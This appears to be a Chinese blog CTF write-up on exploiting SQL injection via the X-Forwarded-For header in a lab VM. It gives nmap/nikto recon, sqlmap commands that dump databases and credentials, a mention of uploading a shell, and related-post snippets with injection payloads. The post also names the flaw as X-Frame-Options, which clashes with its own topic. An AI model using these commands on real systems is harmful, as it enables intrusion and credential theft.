ctf训练 web安全SQL注入(X-Forwarded-For)

最新推荐文章于 2024-10-20 02:47:27 发布
最新推荐文章于 2024-10-20 02:47:27 发布
阅读量652 收藏 5
点赞数 1
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_43799246/article/details/110478319
版权

ctf训练 web安全SQL注入(X-Forwarded-For)

SQL注入漏洞介绍

SQL注入攻击指用用户构建特殊的输入作为参数传入Web应用程序,通过执行sQ语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。

任何一个用户可以输入的位置都可能是注入点。比如url中,以及http报文中;

实验环境

一台kail攻击机 和 靶机
靶机镜像:https://pan.baidu.com/s/1juB-vkfP9C7RHEM5T4ffAA
提取码:dquy

安装打开靶机(使用Oracle VM VirtualBox打开):
注意:靶机用桥接模式则攻击机也用桥接模式,注意检查!!!!)

接下来发现没法登陆,也没有办法获取ip地址
所以我们在kail下
进入控制台

使用netdiscover命令 netdiscover -r ip/子网掩码 命令来探测靶机,靶机ip为192.168.43.181

在这里插入图片描述在这里插入图片描述本机ip为192.168.43.96
在这里插入图片描述

信息探测

扫描主机服务信息以及服务版本
– nmap -sV靶场IP地址
在这里插入图片描述

快速扫描主机全部信息
– nmap -T4 -A -v靶场lP地址
在这里插入图片描述在这里插入图片描述

探测敏感信息
– nikto -host http://靶场IP地址:端口
心在这里插入图片描述发现一个登录界面,于是尝试用浏览器打开
在这里插入图片描述这个页面不存在弱口令,但是可能存在sql漏洞,接下来探测一下

漏洞扫描

漏洞扫描器OWASP ZAP

功能强大,专注于web安全的漏洞扫描器

在这里插入图片描述

在这里插入图片描述这里发现具有sql注入漏洞,漏洞为X-Frame-Options参数

漏洞利用

针对web进行漏洞扫描
对扫描的结果进行分析。注意:如果具有sQL注入漏洞,可以直接利用。毕竟sQL注入是高危漏洞,可以直接获取服务器权限。

使用sqlmap利用SQL注入漏洞

– sqlmap -u url -headers=“X-Forwarded-For:* ” -dbs --batch 查看数据库名
在这里插入图片描述这里是一个一个字节的爆的,所以有一点点慢,耐心等待
在这里插入图片描述

– sqlmap -u url -headers=“X-Forwarded-For:* ” -D “数据库名”-tables 查看对应数据库中的数据表
在这里插入图片描述这里爆表名也是一个一个的爆,耐心等待!!!
在这里插入图片描述

–batch-- sqlmap -u url -headers=“X-Forwarded-For:* ” -D “数据库名” -T “表名” columns 查看对应字段 --batch
在这里插入图片描述在这里插入图片描述

– sqlmap -u url -headers=“X-Forwarded-For:*” -D “数据库名” -T “表名” -C “列名” -dump --batch
在这里插入图片描述
在这里插入图片描述使用获取到的用户名和密码去登录
在这里插入图片描述然后这里就成功进入后台了,也可能进行上传shell一类的操作(之前的文章有提到如何上传shell)
在这里插入图片描述

CTF-HTTP头注入漏洞测试(X-Forwarded-for)
asd158923328的博客
08-21 2364
根据题意 X-Forwarded-For(XFF)是用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段。 进入环境,打开跳转页 打开Burp Suite ,抓包,右键发送给repeater,填入X-Forwarded-For,首先判断是否可注入。 order by 判断表数量,从1开始依次试试,最后发现是4 union select 1,2...
墨者学院-X-Forwarded-For注入漏洞实战
weixin_42939822的博客
03-27 6484
墨者学院-X-Forwarded-For注入漏洞实战
CTF-sql注入(X-Forwarded-For
Reaches_r的博客
08-05 352
1.扫描目标IP发现只开了80http服务 2.进去有个登录界面,考虑sql注入得到账户密码 3.启动AWVS(AcunetixWeb Vulnarability Scanner)添加目标,扫描发现存在X-Forwarded-For注入漏洞 4.使用sqlmap注入攻击(--batch表示自动回应询问) (1)得到数据库名 (2)同理得到表名、列名,暴力破解出账户密码 5.登录后台,上传webshell,控制目标,具体步骤参考前面的文章。 ...
X-Forwarded-ForCTF 中的使用
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
01-07 1373
ip 末尾的 .0.1 要改成变量,当然了,不一定是 10.1.0.1,其他地址也可以,目的是改变 ip 地址实现无限投票。猜测是用户密码,由于是管理员,我们猜测用户为 admin,登录后提示用本地管理员登录。网页提示从本地访问,那就要用到 XFF 了,打开 burp,打开代理,访问网站抓包。下面就举个刷赞的例子。
CTF-SQL注入(X-Forwarded-For
su__xiaoyan的博客
12-24 667
SQL注入Web应用向后台数据库传递SQL语句进行数据库操作时。如果对用户输入的参数没有经过严格的过滤处理,那么攻击者就可以构造特殊的SQL语句,直接输入数据库引擎执行,获取或修改数据库中的数据。 X-Forwarded-For HTTP请求头部字段,用来表示 HTTP 请求端真实 IP。 XFF注入/ X-Forwarded-For XFF,是X-Forwarded-for的缩写,XFF注入SQL注入的一种,该注入原理是通过修改X-Forwarded-for头对带入系统的dns进行sql
CTF实验:X-Forwarded-For注入
floyd_art的博客
04-01 1641
SQL注入漏洞介绍 SQL注入攻击指用用户构建特殊的输入作为参数传入Web应用程序,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。 任何一个用户可以输入的位置都可能是注入点。比如url中,以及http报文中; 信息探测 扫描主机服务信息以及服务版本 – nmap -sV 靶场IP地址 快速扫描主机全部信息 – nmap -T4 ...
CTF练习:SQL注入之X-Forwarded-For报头
qq_43233085的博客
11-28 1059
CTF练习:SQL注入之get参数注入环境准备信息收集漏洞挖掘sqlmap注入上传shell脚本(copy)拿到靶机shell(copy) 靶机地址: 链接: https://pan.baidu.com/s/1u-br8L4Lk4X7EGS7kROhMQ 提取码: 2fmj 环境准备 开启两台机器,一台靶机一台kali攻击机,配置好桥接网络,使其在同一网段内。 查看攻击机kali的IP,为172....
CTF---Web---SQL注入---12---referer修改+手动添加参数
qq_22160557的博客
08-01 1022
文章目录前言一、题目描述二、解题步骤1、修改请求包2、手动添加参数3、sqlmap三、总结 前言 题目分类: CTFWebSQL注入—12—referer修改+手动添加参数 一、题目描述 题目:SQL注入 二、解题步骤 1、修改请求包 Step1:访问http://172.16.15.203/stage/5/6C9428036D386316.php, 弹框“本页面仅接受来自 www.10086.cn的访问”,提示修改“referer”参数 Step2:抓包另存为txt,并修改referer为www
CTF---Web---SQL注入---04---F12network+XXF伪造+sqlmap跑文件
qq_22160557的博客
07-29 1294
文章目录前言一、题目描述二、解题步骤1、信息隐藏2、XXF伪造3、sqlmap文件注入三、总结 前言 题目分类: CTFWebSQL注入—04—F12network+XXF伪造+ sqlmap跑文件 一、题目描述 题目:Simple_Calc_1,简单计算器 提示:XFF伪造 二、解题步骤 1、信息隐藏 Step1:F12—>查看network,刷新一下,就可以看到/backend/目录, 提示:{“success”:true,“count”:2},是访问次数 2、XXF伪造 Step2:其
利用X-Forwarded-For注入:时间盲注与SQL技巧
在这个Bugku Web题目的INSERT INTO注入挑战中,参与者需要利用一个HTTP头(X-Forwarded-For)中的IP地址进行SQL注入攻击。题目提供了一个PHP脚本,该脚本首先获取用户的IP地址,然后将其插入到`client_ip`表中的`ip`...
CTF训练 web安全SQl注入(X-Forwarded-For报文头)
梁辰兴的博客
11-05 593
SQl注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQl语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。任何一个用户可以输入的位置都可能是注入点,比如url中,以及http报文中。只要是用户可以输入的位置都是有可能存在注入点的!
CTF之路:关于X-Forwarded-For注入
zw05011的博客
01-05 3340
题目 输入任意用户名密码登录,显示IP禁止访问。 知识点 伪造XFF头绕过服务器IP过滤 IP伪造 TCP/IP层面的IP伪造很难实现,因为更改后很难实现正常的TCP通信,但在HTTP层面的伪造就显得很容易。可以通过伪造XFF头进行IP伪造 XFF字段 X-Forwarded-For(XFF)简称XFF头,是HTTP 报文头部的关键字段之一。代表了HTTP的请求端真实的IP。它被认为是客户端通过HTTP代理或者负载均衡器连接到web服务端获取源ip地址的一个标准(通常一些网站的防注入..
SQL注入:X-Forwarded-For注入
zh的博客
10-11 583
靶场地址:http://www.whalwl.host:8010/ 解题准备:本题需要使用burpsuite抓包 解题思路: 1、根据提示,直接抓包,添加X-Forwarded-For参数 a' 2、根据报错,确定闭合符为 ' 构造:a' order by 6# 5正常,6错误,确定字段数为5 3、构造联合查询,发现有2,3回显 4、获得user和database 5、后续注入通过联合查询可以很快获取flag ...
CTF夺旗—SQL注入(X-Forwarded-For
最新发布
2202_75858632的博客
10-20 461
!实验说明:!攻击机:kali-linux-2021 IP:192.168.1.105!靶机:Linux IP:192.168.1.1001.首先我们知道靶机IP,我们将进行信息探测,版本服务探测,那使用工具nmap。2.我们看到只有80端口以及它的服务版本号,还有靶机是什么操作系统。3.这里使用工具nikto -host,因为是80端口所以不用加端口,如果不是,是需要加端口的。这里我们看到这是一个web的管理员登录界面,火狐输入网址进入。4.是一个登录页面,我们尝试一下弱口令进入看可不可以进去; (a
Web应用程序漏洞-X-Forwarded-For注入
旺仔Sec&blog
07-20 4210
第二十八步,重新审阅刚刚获取os-shell时的日志,发现sqlmap在网站根目录下放置了一个tmpunjoh.php文件(文件名为随机,请注意),可以用于手动上传文件。可以看到,我们从X-Forwarded-For定义的内容,未经过筛选就执行了SQL语句用于查询该IP地址是否在白名单之内,且。第五步,一分钟后扫描结束,切换至Results标签页,可以看到/admin目录被扫描出来,推测该目录为管理员后台地址。第十六步,在BurpSuite中将X-Forwarded-For的值改为一个单引号(’)尝试。
CTF-sql注入(X-Forwarded-For)【简单易懂】
墨鱼菜鸡
09-10 255
目录 环境配置 信息探测 AWVS漏洞扫描 漏洞利用 扫描数据库 扫描表名 扫描字段值 扫描用户名和密码 环境配置 kali 192.168.20.128 靶机 192.168.20.132 链接:https://pan.baidu.com/s/1vUYqkBnWkrfXvdC99nOsSQ 提取码:4p7w 信息探测 ...
CTF】X-Forwarded-For SQL注入实战
HAPPY
07-30 4712
1.首先burp抓包,分析post包,保存为txt文件 (可看这个 https://blog.youkuaiyun.com/u014549283/article/details/81290015 ,此处用 -r 参数) 2、使用sqlmap进行注入 爆数据库 sqlmap -r xxx.txt --dbs --batch   爆表名 sqlmap -r xxx.txt -D 数据库名 --tab...
小白学习CTF第八天-web安全sql注入(X-Forwarded-For
bbhh1139的博客
04-20 364
X-Forwarded-For SQL注入介绍 信息探测 这些都是基本操作。 打开敏感的网址: 漏洞扫描 添加完目标之后扫描就可以,但是我没使用这个,主要我没安装这个 使用owasp-zap发现有一个高危的漏洞,可以成为sql注入点 漏洞利用 sqlmap -u "http://192.168.56.107" --headers="X-Forwarded-For:*" --db...
利用X-Forwarded-For进行sql注入
wqj975005563的专栏
06-06 4624
由于系统一般会采用String ip = request.getHeader("X-Forwarded-For");进行获取ip,然后注入者就可以通过X-Forwarded-For请求头信息就行伪造ip,当然了这个ip也可以是一些注入语句,如下X-Forwarded-For:payload';WAITFOR DELAY '0:0:5'--String sql = "select * from ta...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

爱吃香菜的哈哈

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值